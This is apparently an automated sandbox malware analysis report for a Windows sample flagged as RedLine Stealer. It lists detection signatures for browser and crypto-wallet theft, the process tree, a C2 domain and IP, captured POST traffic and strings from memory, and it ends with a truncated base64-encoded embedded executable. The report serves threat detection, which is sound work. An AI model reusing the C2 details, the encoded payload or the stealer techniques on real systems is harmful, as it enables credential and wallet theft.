Loading ...

Play interactive tourEdit tour

Windows Analysis Report JEPayKhzWa

Overview

General Information

Sample Name:JEPayKhzWa (renamed file extension from none to exe)
Analysis ID:452458
MD5:f471bf615ef92f5ee73b48fe203373de
SHA1:11f0b6de8d4baf8e039f6244438ebb05bc589923
SHA256:d5608cba3115764a7758fa21c3e2f69724418dc48a8d0f5aaabe7efb71e2f28f
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains very large strings
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JEPayKhzWa.exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\JEPayKhzWa.exe' MD5: F471BF615EF92F5EE73B48FE203373DE)
    • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • JEPayKhzWa.exe (PID: 7152 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
    • JEPayKhzWa.exe (PID: 4680 cmdline: C:\Users\user\Desktop\JEPayKhzWa.exe MD5: F471BF615EF92F5EE73B48FE203373DE)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
      • 0x59ff8:$: VFZxUUFBT
      • 0x1275d0:$: VFZxUUFBT
      00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: JEPayKhzWa.exe PID: 4680JoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Process Memory Space: JEPayKhzWa.exe PID: 4680JoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.JEPayKhzWa.exe.44bdb88.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.JEPayKhzWa.exe.43f05b0.2.unpackSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
                • 0x16420:$: VFZxUUFBT
                0.2.JEPayKhzWa.exe.43f05b0.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  4.2.JEPayKhzWa.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 2 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["kurinogti.info:80"], "Bot Id": "MARA"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: kurinogti.infoVirustotal: Detection: 8%Perma Link
                    Source: http://kurinogti.info:80/Virustotal: Detection: 8%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: JEPayKhzWa.exeVirustotal: Detection: 60%Perma Link
                    Source: JEPayKhzWa.exeReversingLabs: Detection: 62%
                    Source: JEPayKhzWa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: JEPayKhzWa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: kurinogti.infoContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: kurinogti.infoContent-Length: 1098077Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: kurinogti.infoContent-Length: 1098069Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 45.139.184.124 45.139.184.124
                    Source: Joe Sandbox ViewASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                    Source: unknownDNS traffic detected: queries for: kurinogti.info
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: kurinogti.infoContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info46kt
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://kurinogti.info:80/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsP
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713802431.000000000333F000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/ewP
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: JEPayKhzWa.exeString found in binary or memory: https://api.ip.sb/geoip
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb46k
                    Source: JEPayKhzWa.exeString found in binary or memory: https://api.ipify.org
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: JEPayKhzWa.exe, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.713576583.000000000323C000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: JEPayKhzWa.exe, 00000004.00000002.713518289.0000000003227000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary:

                    barindex
                    .NET source code contains very large stringsShow sources
                    Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 0.0.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 0.2.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 3.2.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 3.0.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 4.2.JEPayKhzWa.exe.ef0000.1.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csLong String: Length: 174916
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058519B8 NtUnmapViewOfSection,0_2_058519B8
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_05851A70 NtAllocateVirtualMemory,0_2_05851A70
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058519B3 NtUnmapViewOfSection,0_2_058519B3
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_05851A68 NtAllocateVirtualMemory,0_2_05851A68
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F720500_2_00F72050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CB9500_2_032CB950
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CE2600_2_032CE260
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_032CE9EB0_2_032CE9EB
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058505500_2_05850550
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058F90480_2_058F9048
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FA7D80_2_058FA7D8
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058F83D00_2_058F83D0
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FCB100_2_058FCB10
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FD2780_2_058FD278
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_058FBE700_2_058FBE70
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C20503_2_002C2050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF20504_2_00EF2050
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305D4484_2_0305D448
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305CB504_2_0305CB50
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDF3A04_2_05CDF3A0
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDD1004_2_05CDD100
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CDD0F14_2_05CDD0F1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD00404_2_05CD0040
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD28404_2_05CD2840
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD28314_2_05CD2831
                    Source: JEPayKhzWa.exe, 00000000.00000000.636379499.0000000000FCE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000003.00000000.642849049.000000000031E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.712365192.000000000041A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameReunionist.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exe, 00000004.00000002.712429776.0000000000F4E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exeBinary or memory string: OriginalFilenameBantingism.exe4 vs JEPayKhzWa.exe
                    Source: JEPayKhzWa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.2.JEPayKhzWa.exe.43f05b0.2.unpack, type: UNPACKEDPEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: 0.2.JEPayKhzWa.exe.43f05b0.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: Process Memory Space: JEPayKhzWa.exe PID: 7024, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.csBase64 encoded string: 'VServiceModelChannelsWebSocketTransportDuplexSessionChannelcDisplayClass49144FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU9OQ2ZxQUFBQUFBQUFBQUFPQUFBZ0VMQVRBQUFIQUJBQUFNQUFBQUFBQUE4bjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLQjlBUUJQQUFBQUFLQUJBT1FFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQUNFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE4R3dCQUFBZ0FBQUFjQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU9RRUFBQUFvQUVBQUFnQUFBQjBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF